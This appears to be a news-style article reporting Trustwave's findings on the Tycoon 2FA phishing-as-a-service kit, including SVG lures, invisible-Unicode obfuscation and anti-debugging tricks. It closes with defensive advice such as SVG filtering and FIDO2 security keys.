SVG and invisible Unicode is being increasingly used to hack Microsoft 365 and Google/Gmail users even with multi-factor authentication (MFA). It’s possible because of significant enhancements in the Tycoon 2FA platform.
Hacking into accounts is big business and like most businesses, hacking has moved into the cloud. “Software as a service” (SaaS) is a big thing (e.g. Copilot and other AI among many). Criminals have done the same thing, selling hacking toolkits with an automated online component, known as Phishing-as-a-Service (PhaaS).
These toolkits are a complete subscription service with pre-built phishing kits, user support, attack dashboards, and even credential storage. They can grab user login details, including the time-limited MFA code then, in seconds login to misuse or block the account. All while the hacker is playing an online game or asleep!
Originally discovered by Sekoia researchers in October 2023, Tycoon 2FA Phishing-as-a-Service (PhaaS) has been actively exploited since at least August 2023. The latest developments, reported by Trustwave, reveal that the platform’s operators have implemented several sophisticated techniques to evade detection and bolster their phishing campaigns .
Trustwave has observed a significant increase in phishing attacks utilizing malicious SVG (Scalable Vector Graphics) files, with a reported 1,800% rise from April 2024 to March 2025. These SVG files often masquerade as voice messages or document icons and contain obfuscated JavaScript that redirects victims to counterfeit Microsoft 365 login pages
One notable advancement is the use of invisible Unicode characters within JavaScript code to conceal malicious payloads. This obfuscation method allows the code to execute normally at runtime while evading static analysis and manual inspection
Additionally, Tycoon 2FA has replaced the Cloudflare Turnstile CAPTCHA with a self-hosted version rendered via HTML5 canvas, featuring randomized elements. This change aims to prevent fingerprinting and improve the customization of phishing pages
The platform also incorporates anti-debugging JavaScript designed to detect and block browser automation tools such as PhantomJS and Burp Suite. If suspicious activity is detected, users are redirected to legitimate websites like Rakuten.com to mask the phishing attempt.
What to do?
Most of these attacks are targeted at particular organizations or governments so it’s mostly up to network admins to have robust email filtering systems, maybe block or flag SVG attachments, and adopt phishing-resistant MFA methods, such as FIDO2-compliant security keys, to mitigate the risks posed by advanced phishing platforms like Tycoon 2FA.
For everyone, it’s still a question of being on guard. Be wary of any ‘out of the ordinary’ messages (email, instant message or voice) and especially anything which tries to provoke an ‘urgent’ response. Hackers try to trick people into acting without thinking.
